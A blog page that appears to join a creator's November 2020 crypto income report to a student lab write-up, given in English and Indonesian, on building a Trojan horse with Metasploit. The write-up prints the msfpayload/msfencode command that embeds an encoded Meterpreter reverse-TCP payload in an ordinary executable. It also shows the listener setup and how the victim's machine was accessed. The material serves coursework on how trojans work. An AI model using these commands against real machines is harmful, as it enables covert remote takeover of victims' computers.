November 30, 2020

My Blogger Income November 2020 and Personal Missions

Content Creation

Blogs

Videos

  • LBRY: LBC 0 ≈ $0

Images

Personal Monetization

Common Tasks

Browsing

Cointiply

  • Survey, faucet, etc.: $0

Referrals

Currently the quantity is too much to handle when the value I earned is not much. So I may report this on a separate article.

November 2020 Income ≈ $126.5205

Grade: C

Personnal Comments

Yes, I earned $20 less than last month but I actually feel that I earned more than I expected. I wrote sad things last month and I predicted that I cannot continue like this much longer. It was sad for me because this would have been almost a perfect life as a full time content creator if I were living alone where earning a hundred dollar a month is enough for me. By then, I made a decision to stop working on my book, stop writing about my ideas, stop pursuing online earnings, and complete my curriculum vitae to increase my opportunity of getting a job. Yes, this month I was working full in publishing any research and scientific writing that I have written in the past during my studies online where I only expect to earn a few pennies but I never expect that I reached over a hundred dollars a month once again and received some supportive comments that liked those works. Therefore I would like express my deepest gratitude to everyone in the platforms that I mentioned above.

Personal Missions

Last month I expressed my sadness of having to give up this dream job but this month I finally understood the main reason why I was sad. It is not truly because I have to give up my dream job but because I have personal missions that I want to fulfill. This month, I realized what those personal missions are that I subconsciously made long ago:

  1. Publish everything that I have done during my studies to my blog. I have accomplished my primary mission long ago which are publishing my publications, final project, thesis, and dissertation to my blog, and almost accomplished my secondary mission which are posting any research or scientific articles and assignments to my blog. As for the rest of my small assignments, I am willing to post them leisurely and in indefinite time with ofcourse a quality that is good enough at least from my evaluation.
  2. Write an article about almost all the videos the I uploaded for example I wrote a detailed article about my current most popular video about fixing optimus laptop blank screen when installing Nvidia driver in Kali Linux. One example that I really want to write is my tutorial about upgrading Moodle from version 1 to version 3 conducted on an actual case of elearning.unud.ac.id which I believed it is a significant problem that is rarely discussed.
  3. Finally, I would like to finish my book about cryptocurrency 101 for users. I would like to stay unemployed and focus until I finish up to this mission or at least a majority of it. I am willing to put the rest of my desires to the shelf or to the waiting list for an indefinite of time. For example, I have more books that I want to write but if I have to give up on it, then I have to give up.
  4. Not only video record myself playing story video games but also write a detailed story and conversation of the video games. This was inspired by Youtube's timestamp and the situation since long that I no longer have time to play story video games but I still want to know the story so I watched the Youtube gameplay briefly. Also I wanted to be a video game streamer because I was actually a fan of story video games but have to give up playing games after I became busy since my undergraduate studies.
  5. I want to try referral blogging where I write a good article about a product that has a referral system and put my link there and see the earnings while at the same time adding more quantity to my blog. For example, the fourth chapter of my book about cryptocurrency 101 for users.
  6. I wanted to be a Youtuber because I enjoyed it and stories of famous crypto youtubers that he actually earns more quitting his job and do the work he was passionate about and one of them is being a crypto youtuber. Also a sarcasm that if we love Saturdays and hate Mondays is an indication that we hate our jobs and why are we stupid enough to accept how it is for years while other people are enjoying their lives? This happened to me in highschool, some years of my undergraduate, and my job in 2015. In my graduate studies and now I found blogger to be my passion more than a youtuber I really felt that the distance between Mondays and Fridays are short. Often during the weekends, I regretted to not work more on weekdays and wished I could go back to Monday where in the end I almost always chose not to take holidays on weekends and just keep blogging.
  7. I became very interested in cryptocurrency and I really want to start learning programming such as programming Bitcoin and writing smart contracts on Ethereum. Alas I am in a phase where learning is not appreciated but results mainly incomes are expected. I hope that I am wrong but the people whom I wrote this report for are probably are not interested in this writing but only interested in the numbers above and that is it whether it is enough or not, whether the numbers can amaze them or not. So I thank you very much if you really read in detail until this point.

Appendix

Publish0x Earnings
Publish0x Earnings
Publish0x Contest
Publish0x Competition Earnings
ReadCash Earnings
ReadCash Earnings, right after October Income report I did not earn anything. Either the admins read it and decide to blacklist me for it and/or the bot detected me as a cross poster. Well no matter, I did not come to read.cash for that. I initially came solely because it is another blogging platform especially a crypto one where users can tip in Bitcoin Cash and I want to share my posts to its users. The random rewarder bot was a surprising bonus and thank you for supporting me last month. I'm thankful enough to be allowed to post there and I will continue.
Blurt Earnings
Blurt Earnings
Hive Earnings
Hive Earnings
Steemit Earnings
Steemit Earnings
Leo Finance Earnings
Leo Finance and STEM Geeks Earnings
Filearmy Earnings
Filearmy Earnings
Bittube Airtime Earnings
Bittube Airtime Earnings
Netbox Browser Rewards
Netbox Browser Rewards

Donation

Personally, I enjoyed being a full time independent content creator very much and I once again thank the platforms, investors, donators, and viewers for making my venture possible through donations, tippings, and upvotes. If you enjoy and/or want to further support my work you may choose more form of donation:

qr donation
Bitcoin bc1q6hg4lllxthryke7zhxflcdrcm0nr8ph7antxk9, Ethereum 0x3D4c67A2A40bC24ec53ab767b9247c02A2250BCB, Litecoin ltc1qqxl8dng0swv7zuhe30y5kzwht3l25krfaqzu2k, XRP r9rwEdZBWFRbsGzwG5gm1MjDoyBKWLPyx5, Bitcoin Cash qpd74d52rxpt3w70qv555ccq0254j7dhtg2mxst0dc, Binance Chain bnb10hdlv95jyjn92j2l6um6gkmc96a6g57lnezd66, Monero 43V43g1UC9AdgjmjJZPQRxCotyi9VTb8jbYisw2cSqEjbuvp9Y, paypal.me/fajarpurnama.
Animation Source Code

Mirror

November 29, 2020

Trojan Horse Demonstration with Metasploit Framework Payload

Illustrasi Trojan Horse MSFpayload
Figure 0. Trojan Horse MSFpayload Illustration

Note

This is my undergraduate assignment that I translated to English myself in the Data Security System course where the task is to write an essay on Trojan Horse in groups but I was also interested in putting it into practice. Therefore, I tried to practice Trojan horse with the metasploit framework. The difference between a trojan horse and a regular backdoor is that a trojan horse is disguised as a legitimate program. Apart from me this group consisted of Dwi Angga Pratama, Yulianti Murprayana, Linda Krisna Dewi, and Agus Riki Gunawan. This task has never been published anywhere and we as the authors and copyright holders license this task customized CC-BY-SA where anyone can share, copy, republish, and sell it on condition that to state our name as the author and notify that the original and open version available here.

Chapter 1 Introduction

1.1 Background

Trojan horse is a common malware that we know about. In short it is a backdoor where this malware is attached to a file then it will work if the file is executed. Many people use antivirus such as AVG, Avast, Avira, Kaspersky, or others and it is often the case that the antivirus detects trojans. However, few people know what a trojan is and how it works. In this experiment, we will describe how a Trojan horse works using msfpayload from metasploit.

1.2 Problem

How does a Trojan horse work?

1.3 Objective

Describe how a Trojan horse works using metasploit.

1.4 Benefit

Get an idea of how a Trojan horse works by seeing the process of breaking into the system firsthand.

1.5 Scope and Limitation

  1. The file used to experiment is a .exe extension.
  2. The backdoor is created with msfpayload and executed with metasploit.
  3. The victim is Windows 7.
  4. Only connected via LAN (Local Area Network).
  5. The victim does not use an antivirus.

Chapter 2 Basic Theory

2.1 Definition of Back Door

Back door is a special access made by a programmer to enter the system. In the operating system a programmer enters certain commands. From these commands, a hacker can pass the commands that must be followed when someone enters an operating system but the code that is inserted does not affect the performance of the operating system.

The term backdoor is now used by hackers to refer to a mechanism that allows a system hacker to re-access a system that has been attacked before without having to repeat the process of exploiting the system or network, as he did the first time. Generally, after a network has been attacked using an exploit (against a vulnerability), an attacker will cover all traces of it on the system by modifying system log files (logs) or deleting them, and then installing a backdoor which is a piece of speical software or add a user account that has access rights as a network administrator or system administrator. If the owner of the network or system later realizes that his system has been attacked, then the owner closes all known vulnerabilities in his system but does not detect a backdoor installed, the previous attacker will still be able to access the system in question, without the network owner getting caught, much less after he registers himself as a legitimate user in the system or network. By having the rights as a network administrator, he can also do things that can damage the system or lose data. In cases like the one above, the usual method is to reinstall the system or network, or to restore a clean backup.

There are several tools that can be used to install a backdoor, such as some Trojan horses, but the most popular is Netcat, which can be used on Windows or UNIX operating systems.

2.2 Trojan Horse Definition

Trojan horses are not classified as viruses, although they share the same characteristics, they infect computers via files that appear harmless and usually do something useful. But eventually the virus becomes dangerous, for example can format a hard drive.

2.3 How the Trojan Horse Works

Trojan enters through two parts, namely the client and server. So hackers sometimes have to walk to embed the trojan on the victim's computer or lure the victim to execute / open a file containing the Trojan, but there are also Trojans that directly infect the victim only with the victim's ip such as Kaht. When the victim (unnoticed) runs a file containing Trojan on his computer, then the attacker will use the client to connect with the server and start using the trojan. TCP/IP protocol is a commonly used type of protocol for communication, Trojans can work well with this type of protocol, but some trojans can also use UDP protocol well. When the server starts (on the victim's computer), Trojans generally try to hide somewhere in the computer system, then start opening several ports to connect, modify the registry and or use other methods, namely the autostarting method so that the trojan will automatically activate when the computer turned on. Trojans are very dangerous for computer users connected to a computer network or the internet, because hackers could steal sensitive data such as email passwords, dial-up passwords, web service passwords, e-mail addresses, work documents, internet banking, paypal, e-gold, credit cards and others.

2.4 Types of Trojan Horse

2.4.1 Trojan Remote Access

Remote Access Trojans are among the most popular Trojans today. Many attackers use this Trojan for reasons of many functions and is very easy to use. The process is waiting for someone to run a Trojan that functions as a server and if the attacker already has the victim's IP address, then the attacker can take full control of the victim's computer. An example of this type of Trojan is Back Orifice (BO), which consists of BOSERVE.EXE running on the victim's computer and BOGUI.EXE which is run by the attacker to access the victim's computer.

2.4.2 Password Sending Trojan

The purpose of this type of Trojan is to send passwords that are on the victim's computer or on the Internet to a special e-mail that has been prepared. Examples of intercepted passwords include ICQ, IRC, FTP, HTTP or other applications that require a user to enter a login and password. Most of these Trojans use port 25 for sending e-mail. This type is very dangerous if there is a very important password on the computer.

2.4.3 File Transfer Protocol (FTP) Trojan

The FTP Trojan is the simplest and is considered outdated. The only function that is executed is to open port 21 on the victim's computer which makes it easier for someone to have an FTP client to enter the victim's computer without a password and download or upload files.

2.4.4 Keyloggers

Keyloggers are a simple type of Trojan, with the function of recording keystrokes while the victim is typing and saving them in a logfile. If between the taps is filling in the user name and password, then both can be obtained by the attacker by reading the logfile. This Trojan can be run when the computer is online or offline. This Trojan can know the victim is online and record everything, when offline the recording process is carried out after Windows is started and stored on the victim's hard drive and waits online to make transfers.

2.4.5 Trojan Destroyer

Keyloggers are a simple type of Trojan, with the function of recording or recording keystrokes while the victim is typing and saving them in a logfile. If between the taps is filling in the user name and password, then both can be obtained by the attacker by reading the logfile. This Trojan can be run when the computer is online or offline. This Trojan can know whether the victim is online and record everything, when offline the recording process is carried out after Windows is started and stored on the victim's hard drive and waits online to make transfers or be taken by the attacker.

2.4.6 Trojan Denial of Service (DoS) Attack

Trojan DoS Attack is currently one of the most popular. This Trojan has the ability to run Distributed DoS (DDoS) if it has enough victims. The main idea is that if the attacker has 200 infected victims using ADSL, then start attacking the victims simultaneously. The result is very dense data traffic due to insistent demand and exceeds the bandwidth capacity of the victim. This causes Internet access to be closed. Wintrinoo is a very popular DDoS tool recently, and if an attacker has infected ADSL users, some of the main Internet sites will collapse. Another variation of a DoS trojan is the mail-bomb trojan, the main purpose of which is to infect as many computers as possible and to simultaneously attack specific e-mail addresses and other specific addresses with random targets and content that cannot be filtered.

2.4.7 Proxy/Wingate Trojan

Attractive shapes and patterns are applied by the trojan maker to trick the victim by using a Proxy/Wingate server which is provided for the whole world or only for the attacker. Trojan Proxy/Wingate is used on anonymous Telnet, ICQ, IRC, and to register domains with stolen credit card numbers and for other unauthorized activities. This Trojan equips the attacker with anonymity and provides the opportunity to do everything to the victim's computer and untraceable trail.

2.4.8 Software Detection Killers

Some Trojans are equipped with the ability to disable detection software, but there are also standalone programs with the same function. Examples of detection software that can be disabled are Zone Alarm, Norton Anti-Virus and other anti-virus/firewall programs that protect computers. When the detection software is disabled, the attacker will have full access to the victim's computer, carry out some unauthorized activities, use the victim's computer to attack other computers.

2.5 How to Overcome the Dangers of a Trojan Horse

2.5.1 Task List

Detection by looking at the list of running programs in the task list. The list can be displayed by pressing the CTRL + ALT + DEL keys or right-clicking on the toolbar and then clicking task manager. Besides being able to find out which programs are running, users can terminate a program that is considered strange and suspicious. However, some Trojans are still able to hide from this task list. So to find out which programs are running as a whole, you need to open the System Information Utility (msinfo32.exe) which is in C:\Program files\common files\microsoft shared\msinfo. This tool can see all the processes that are running, whether hidden from the task list or not. Things to check are the path, file name, file properties and the running of * .exe and * .dll files.

2.5.2 Netstat

All Trojans need communication. If they do not communicate the goal is in vain. This is the main drawback of Trojans, with communication means that they leave a trail which can then be traced. The Netstat command opens connections to and from someone's computer. If this command is executed it will display the IP address of the computer and the computer connected to it. If found an IP address that is not known it needs to be investigated further, chasing it and catching it.

2.5.3 TCP View

TCPVIEW is a free utility from Sysinternals that has the ability to display IP addresses and display programs used by other people to connect with the user's computer. By using this information, if there is an attack it can be known and can counterattack Trojan, Trojan removal steps can be removed by using an Anti-Virus Software. Some antiviruses can be used to identify and remove Trojans. Using Trojan Scanner software, software specifically for detecting and removing Trojans. The most sadistic way is to reinstall the computer.

2.6 Metasploit Definition

Metasploit is a security software that is often used to test the resilience of a system by exploiting a system's software weaknesses. Metasploit is usually used to attack the application layer with a 0 day attack, which is a method of attacking unpatched software. Metasploit is usually associated with the term remote exploitation, which means that the attacker is at a great distance to control the victim's computer. Metasploit attacks by sending exploits to the victim's computer. This exploit contains a payload that has been determined by the attacker. Exploit is a software that functions to exploit weaknesses in the victim's software (for example a web browser), after successfully executing the exploit enters the payload into the victim's memory. The payload is an executable belonging to the attacker which will be run on the victim's computer with the aim of being able to remotely control the computer or install backdoors, trojans, viruses, worms, and others. Apart from the use of metasploit being misused for crime, this software also helps System Security to strengthen its network defenses from outside attackers.

Chapter 3 Experimental Method

3.1 Place and Time of Experiment

The experiment was carried out at home at Jln. Kusuma Bangsa 5, Denpasar, Bali. Trial time on Monday, April 5, 2013, at 23:00 - 24:00.

3.2 Tools and Materials

Laptop ACER

  • Intel® Pentium® dual – core processor T4200 (2.0 GHz, 800 MHz FSB, 1 MB L2 cache)
  • Mobile Intel® Graphics Media Accelerator 4500MHD
  • 1GB DDR2
  • 128 WXGA Acer CrystalBriteTM LCD
  • 250GB HDD
  • Realtek Semiconductor Co., Ltd. RTL8111/8168B PCI Express Gigabit Ethernet Controller
  • Atheros Communications Inc. AR928X Wireless Network Adapter
  • Operating System Linux Backtrack 5 R3 32 bit

PC

  • Intel® Pentium® core i5 processor
  • 4 GB RAM
  • 1GB VGA
  • Gigabit Ethernet Controller
  • Alcor Micro, Corp. USB 2.0 PC Camera
  • Operating System Windows 7 Ultimate 32 bit

3.3 Experiment Steps

If you don't have metasploit then install it with the command "apt-get install metasploit apache2". Because metasploit version 4.5 must be installed via the web, therefore apache is required. Then open a browser and go to https://localhost:3790. Get the license and update it at the terminal with the command "msfupdate". If it is true then there will be a folder /opt/metasploit.

Install metasploit
Figure 3.1 Install metasploit

To see the payload types provided by metasploit, use "msfpayload -l". We will use windows/meterpreter/reverse_tcp.

Melihat payload yang disediakan metasploit 1
Figure 3.2 Viewing the payload provided by metasploit 1
Melihat payload yang disediakan metasploit 2
Figure 3.3 Viewing the payload provided by metasploit 2

Look at the IP address on the network device you want to connect to with the command "ifconfig". Here the IP address is 192.168.0.1.

Melihat IP address perangkat jaringan
Figure 3.4 Viewing the IP address of a network device

Here the file that will be attached to the payload is mdma.exe which is attached to /root. Then the command is "msfpayload windows/meterpreter/reverse_tcp LHOST = 192.168.0.1 LPORT = 443 R | msfencode -e x86 / shikata_ga_nai -c 5 -t exe -x /root/mdma.exe -k -o /root/mdma1.exe”. LHOST is a listening host, namely the IP address on this network device. LPORT is a listening port depending on your taste. Thanks to msfencode and shikata_ga_nai trojan attachments are possible. -e specifies the format that is x86, -c specifies the number of iterations, -t selects the file extension, -x specifies the file location, -k is for the payload to work on another task with the original program still running, and -o is a place and name new files.

Membuat backdoor
Figure 3.5 Creating a backdoor

Set up msfconsole to control victim's computer. Type "-help" if you are not familiar with commands. There is a command facility "search [any word]" to view commands related to what was typed.

Msfconsole
Figure 3.6 Msfconsole

Type the command "use exploit /multi/handler" (which is used for the backdoor). Next, type the command "set payload windows/meterpreter/reverse_tcp" (the payload used).

Menggunakan exploit/multi/handler
Figure 3.7 Using the exploit/multi/handler
Menggunakan windows/meterpreter/reverse_tcp
Figure 3.8 Using windows/meterpreter/reverse_tcp

Continue with the command "set lhost 192.168.0.1" (listening host), then "set lport 443" (listening port), type "show options" to see the settings.

Mengatur option
Figure 3.9 Setting options

The last command is "exploit", just waiting for the victim to run mdma1.exe.

Perintah exploit
Figure 3.10 The exploit command

Chapter 4 Discussion

4.1 Entering the victim's PC with the backdoor that has been created

The assumption is that the victim's PC is not using antivirus and the victim is sent the mdma1.exe file and runs it. It appears that the program is running as usual, but access is opened from the attacker's PC. The following is the IP configuration of the victim PC:

File mdma1.exe akan dikirim ke PC korban
Figure 4.1 The mdma1.exe file will be sent to the victim's PC
IP Address PC korban
Figure 4.2 IP Address of the victim's PC
IP Address PC korban
Figure 4.3 The victim opens the mdma1.exe file
PC penyerang mendapat akses
Figure 4.4 The attacker's PC got access
tampak isi partisi D pada PC korban
Figure 4.5 Evidenced by looking at the directory looks the contents of partition D on the victim PC
Tampak isi partisi D dari sisi PC penyerang
Figure 4.6 Shows the contents of partition D from the attacker's PC side

Chapter 5 Closing

5.1 Conclusion

From the experiment, it is illustrated that Trojan horses, backdoors and the like work in secret. Malware is inserted in a file and will work when the file is executed. The files work as usual but also perform other tasks based on the malware being inserted. In this experiment, the task of the malware is to give the attacker's PC access to the victim's PC. So that the attacker's PC gets access like an admin.

5.2 Future Work

This experiment can be developed further. For example, with the victim's PC using antivirus, operating systems other than Windows, or other things. You can also use other than msfpayload, create your own programs, create new concept trojans, or other things.

Mirror

Demonstrasi Trojan Horse dengan Metasploit Framework Payload

Illustrasi Trojan Horse MSFpayload
Gambar 0. Illustrasi Trojan Horse MSFpayload

Catatan

Ini merupakan tugas S1 saya di mata kuliah Sistem Keamanan Data dimana tugasnya adalah menuis essai mengenai Trojan Horse berkelompok namun saya juga tertarik untuk mempraktikannya. Oleh karena itu saya coba mempraktikan trojan horse dengan metasploit framework. Bedanya trojan horse dengan backdoor biasa adalah trojan horse menyamar sebagai program sah. Selain saya kelompok ini terdiri dari Dwi Angga Pratama, Yulianti Murprayana, Linda Krisna Dewi, dan Agus Riki Gunawan. Tugas ini tidak pernah dipublikasi dimanapun dan kami sebagai penulis dan pemegang hak cipta melisensi tugas ini customized CC-BY-SA dimana siapa saja boleh membagi, menyalin, mempublikasi ulang, dan menjualnya dengan syarat mencatumkan nama kami sebagai penulis dan memberitahu bahwa versi asli dan terbuka tersedia disini.

BAB 1 Pendahuluan

1.1 Latar Belakang

Trojan horse merupakan suatu malware yang umum kita ketahui. Secara singkat dia merupakan suatu backdoor dimana malware ini dilampirkan pada suatu file lalu dia akan bekerja jika file tersebut dijalankan. Di kalangan masyarakat banyak menggunakan antivirus seperti AVG, Avast, Avira, Kaspersky, atau lain-lainnya dan sering kejadian bahwa antivirus tersebut mendeteksi trojan. Namun baru sedikit yang mengetahui trojan itu apa dan bagaimana dia bekerja. Pada percobaan ini akan di gambarkan bagaimana trojan horse dengan menggunakan msfpayload dari metasploit.

1.2 Rumusan Masalah

Bagaimana gambaran trojan horse bekerja?

1.3 Tujuan

Menggambarkan cara kerja trojan horse dengan menggunakan metasploit.

1.4 Manfaat

Mendapatkan gambaran bagaimana trojan horse bekerja dengan melihat proses pembobolan sistem secara langsung.

1.5 Ruang Lingkup dan Batasan

  • File yang digunakan untuk percobaan dengan extensi .exe.
  • Backdoor dibuat dengan msfpayload dan dijalankan dengan metasploit.
  • Korban adalah Windows 7.
  • Hanya terkoneksi secara LAN (Local Area Network).
  • Korban tidak menggunakan antivirus.
  • BAB 2 Dasar Teori

    2.1 Pengertian Back Door

    Back door merupakan akses khusus yang dibuat oleh seorang programmer untuk dapat masuk ke dalam sistem. Di dalam sistem operasi seorang programmer memasukkan perintah-perintah tertentu. Dari perintah-perintah inilah seorang hacker dapat melewati perintah-perintah yang harus dilalui apabila seseorang memasuki suatu sistem operasi tapi kode-kode yang disisipkan tersebut tidak mempengaruhi kinerja sistem operasi.

    Istilah backdoor sekarang digunakan oleh hacker-hacker untuk merujuk kepada mekanisme yang mengizinkan seorang peretas sistem dapat mengakses kembali sebuah sistem yang telah diserang sebelumnya tanpa harus mengulangi proses eksploitasi terhadap sistem atau jaringan tersebut, seperti yang ia lakukan pertama kali. Umumnya, setelah sebuah jaringan telah diserang dengan menggunakan exploit (terhadap sebuah kerawanan/vulnerability), seorang penyerang akan menutupi semua jejaknya di dalam sistem yang bersangkutan dengan memodifikasi berkas catatan sistem (log) atau menghapusnya, dan kemudian menginstalasikan sebuah backdoor yang berupa sebuah perangkat lunak khusus atau menambahkan sebuah akun pengguna yang memiliki hak akses sebagai administrator jaringan atau administrator sistem tersebut. Jika kemudian pemilik jaringan atau sistem tersebut menyadari bahwa sistemnya telah diserang, dan kemudian menutup semua kerawanan yang diketahui dalam sistemnya (tapi tidak mendeteksi adanya backdoor yang terinstalasi), penyerang yang sebelumnya masih akan dapat mengakses sistem yang bersangkutan, tanpa ketahuan oleh pemilik jaringan, apalagi setelah dirinya mendaftarkan diri sebagai pengguna yang sah di dalam sistem atau jaringan tersebut. Dengan memiliki hak sebagai administrator jaringan, ia pun dapat melakukan hal yang dapat merusak sistem atau menghilangkan data. Dalam kasus seperti di atas, cara yang umum digunakan adalah dengan melakukan instalasi ulang terhadap sistem atau jaringan, atau dengan melakukan restorasi dari cadangan/backup yang masih bersih dari backdoor.

    Ada beberapa perangkat yang dapat digunakan untuk menginstalasikan backdoor, seperti halnya beberapa Trojan horse, tetapi yang populer adalah Netcat, yang dapat digunakan di dalam sistem operasi Windows ataupun UNIX.

    2.2 Pengertian Trojan Horse

    Trojan Horse ini disebut kuda troya dimana trojan horse tidak menyebar seperti lain. Trojan horse tidak tergolong virus walaupun karakteristiknya sama, Trojan menginfeksi computer melalui file yang kelihatannya tidak berbahaya dan biasanya justru melakukan sesuatu yang berguna. Namun akhirnya virus menjadi berbahaya, misalnya saat melakukan format hardisk.

    2.3 Cara Kerja Trojan Hourse

    Trojan masuk melalui dua bagian, yaitu bagian client dan server. Jadi hacker kadang harus berjalan menanamkan trojannya di komputer korban ataupun memancing agar sang korban mengeksekusi/membuka file yang mengandung Trojan, namun ada juga Trojan yang langsung menginfeksi korbannya hanya dengan berbekal ip korban misalnya Kaht. Ketika korban (tanpa diketahui) menjalankan file yang mengandung Trojan pada komputernya, kemudian penyerang akan menggunakan client untuk koneksi dengan server dan mulai menggunakan trojan. Protokol TCP/IP adalah jenis protokol yang umum digunakan untuk komunikasi, Trojan dapat bekerja dengan baik dengan jenis protokol ini, tetapi beberapa trojan juga dapat menggunakan protokol UDP dengan baik. Ketika server mulai dijalankan (pada komputer korban), Trojan umumnya mencoba untuk menyembunyikan diri di suatu tempat dalam sistem komputer tersebut, kemudian mulai membuka beberapa port untuk melakukan koneksi, memodifikasi registry dan atau menggunakan metode lain yaitu metode autostarting agar trojan menjadi otomatis aktif saat komputer dihidupkan. Trojan sangat berbahaya bagi pengguna komputer yang tersambung jaringan komputer atau internet, karena bisa jadi hacker bisa mencuri data-data sensitif misalnya password email, dial-up passwords, webservices passwords, e-mail address, dokumen pekerjaan, internet banking, paypal, e-gold,kartu kredit dan lain-lain.

    2.4 Macam-macam Trojan Hourse

    2.4.1 Trojan Remote Access

    Trojan Remote Access termasuk Trojan paling populer saat ini. Banyak penyerang menggunakan Trojan ini dengan alasan fungsi yang banyak dan sangat mudah dalam penggunaannya. Prosesnya adalah menunggu seseorang menjalankan Trojan yang berfungsi sebagai server dan jika penyerang telah memiliki IP address korban, maka penyerang dapat mengendalikan secara penuh komputer korban. Contoh jenis Trojan ini adalah Back Orifice (BO), yang terdiri dari BOSERVE.EXE yang dijalankan dikomputer korban dan BOGUI.EXE yang dijalankan oleh penyerang untuk mengakses komputer korban.

    2.4.2 Trojan Pengirim Password

    Tujuan dari Trojan jenis ini adalah mengirimkan password yang berada di komputer korban atau di Internet ke suatu e-mail khusus yang telah disiapkan. Contoh password yang disadap misalnya untuk ICQ, IRC, FTP, HTTP atau aplikasi lain yang memerlukan seorang pemakai untuk masuk suatu login dan password. Kebanyakan Trojan ini menggunakan port 25 untuk mengirimkan e-mail. Jenis ini sangat berbahaya jika dalam komputer terdapat password yang sangat penting.

    2.4.3 Trojan File Transfer Protocol (FTP)

    Trojan FTP adalah paling sederhana dan dianggap ketinggalan jaman. Satu-satunya fungsi yang dijalankan adalah membuka port 21 di komputer korban yang menyebabkan mempermudah seseorang memiliki FTP client untuk memasuki komputer korban tanpa password serta melakukan download atau upload file.

    2.4.4 Keyloggers

    Keyloggers termasuk dalam jenis Trojan yang sederhana, dengan fungsi merekam atau mencatat ketukan tombol saat korban melakukan pengetikan dan menyimpannya dalam logfile. Apabila diantara ketukan tersebut adalah mengisi user name dan password, maka keduanya dapat diperoleh penyerang dengan membaca logfile. Trojan ini dapat dijalankan pada saat komputer online maupun offline. Trojan ini dapat mengetahui korban sedang online dan merekam segala sesuatunya, pada saat offline proses perekaman dilakukan setelah Windows dijalankan dan disimpan dalam hardisk korban dan menunggu saat online untuk melakukan transfer atau diambil oleh penyerang.

    2.4.5 Trojan Penghancur

    Keyloggers termasuk dalam jenis Trojan yang sederhana, dengan fungsi merekam atau mencatat ketukan tombol saat korban melakukan pengetikan dan menyimpannya dalam logfile. Apabila diantara ketukan tersebut adalah mengisi user name dan password, maka keduanya dapat diperoleh penyerang dengan membaca logfile. Trojan ini dapat dijalankan pada saat komputer online maupun offline. Trojan ini dapat mengetahui korban sedang online dan merekam segala sesuatunya, pada saat offline proses perekaman dilakukan setelah Windows dijalankan dan disimpan dalam hardisk korban dan menunggu saat online untuk melakukan transfer atau diambil oleh penyerang.

    2.4.6 Trojan Denial of Service (DoS) Attack

    Trojan DoS Attack saat ini termasuk yang sangat populer. Trojan ini mempunyai kemampuan untuk menjalankan Distributed DoS (DDoS) jika mempunyai korban yang cukup. Gagasan utamanya adalah bahwa jika penyerang mempunyai 200 korban pemakai ADSL yang telah terinfeksi, kemudian mulai menyerang korban secara serempak. Hasilnya adalah lalu lintas data yang sangat padat karena permintaan yang bertubi-tubi dan melebihi kapasitas band width korban. Hal tersebut menyebabkan akses Internet menjadi tertutup. Wintrinoo adalah suatu tool DDoS yang populer baru-baru ini, dan jika penyerang telah menginfeksi pemakai ADSL, maka beberapa situs utama Internet akan collaps. Variasi yang lain dari sebuah trojan DoS adalah trojan mail-bomb, tujuan utamanya adalah untuk menginfeksi sebanyak mungkin komputer dan melakukan penyerangan secara serempak ke alamat e-mail yang spesifik maupun alamat lain yang spesifik dengan target yang acak dan muatan/isi yang tidak dapat disaring.

    2.4.7 Trojan Proxy/Wingate

    Bentuk dan corak yang menarik diterapkan oleh pembuat trojan untuk mengelabui korban dengan memanfaatkan suatu Proxy/Wingate server yang disediakan untuk seluruh dunia atau hanya untuk penyerang saja. Trojan Proxy/Wingate digunakan pada Telnet yang tanpa nama, ICQ, IRC, dan untuk mendaftarkan domain dengan nomor kartu kredit yang telah dicuri serta untuk aktivitas lain yang tidak sah. Trojan ini melengkapi penyerang dengan keadaan tanpa nama dan memberikan kesempatan untuk berbuat segalanya terhadap komputer korban dan jejak yang tidak dapat ditelusuri.

    2.4.8 Software Detection Killers

    Beberapa Trojan telah dilengkapi dengan kemampuan melumpuhkan fungsi software pendeteksi, tetapi ada juga program yang berdiri sendiri dengan fungsi yang sama. Contoh software pendeteksi yang dapat dilumpuhkan fungsinya adalah Zone Alarm, Norton Anti-Virus dan program anti-virus/firewall yang lain berfungsi melindungi komputer. Ketika software pendeteksi dilumpuhkan, penyerang akan mempunyai akses penuh ke komputer korban, melaksanakan beberapa aktivitas yang tidak sah, menggunakan komputer korban untuk menyerang komputer yang lain.

    2.5 Cara Mengatasi Bahaya Trojan Horse

    2.5.1 Task List

    Pendeteksiannya dengan melihat daftar program yang sedang berjalan dalam task list. Daftar dapat ditampilkan dengan menekan tombol CTRL+ALT+DEL atau klik kanan pada toolbar lalu klik task manager. Selain dapat mengetahui program yang berjalan, pemakai dapat melakukan penghentian terhadap suatu program yang dianggap aneh dan mencurigakan. Namun beberapa Trojan tetap mampu menyembunyikan dari task list ini. Sehingga untuk mengetahui secara program yang berjalan secara keseluruhan perlu dibuka System Information Utility(msinfo32.exe) yang berada di C:\Program files\common files\microsoft shared\msinfo. Tool ini dapat melihat semua proses itu sedang berjalan, baik yang tersembunyi dari task list maupun tidak. Hal-hal yang perlu diperiksa adalah path, nama file, properti file dan berjalannya file *.exe serta file *.dll.

    2.5.2 Netstat

    Semua Trojan membutuhkan komunikasi. Jika mereka tidak melakukan komunikasi berarti tujuannya sia-sia. Hal ini adalah kelemahan yang utama dari Trojan, dengan komunikasi berarti mereka meninggalkan jejak yang kemudian dapat ditelusuri. Perintah Netstat berfungsi membuka koneksi ke dan dari komputer seseorang. Jika perintah ini dijalankan maka akan menampilkan IP address dari komputer tersebut dan komputer yang terkoneksi dengannya. Jika ditemukan IP address yang tidak dikenal maka perlu diselidiki lebih lanjut, mengejar dan menangkapnya.

    2.5.3 TCP View

    TCPVIEW adalah suatu free utility dari Sysinternals yang mempunyai kemampuan menampilkan IP address dan menampilkan program yang digunakan oleh orang lain untuk koneksi dengan komputer pemakai. Dengan menggunakan informasi tersebut, maka jika terjadi penyerangan dapat diketahui dan dapat melakukan serangan balik. Langkah penghapusan Trojan Trojan dapat dihapus dengan: Menggunakan Software Anti-Virus. Sebagian antivirus dapat digunakan untuk mengenali dan menghapus Trojan. Menggunakan Software Trojan Scanner, software yang di khususkan untuk mendeteksi dan menghapus Trojan Cara yang paling sadis yah diinstal ulang komputernya.

    2.6 Pengertian Metasploit

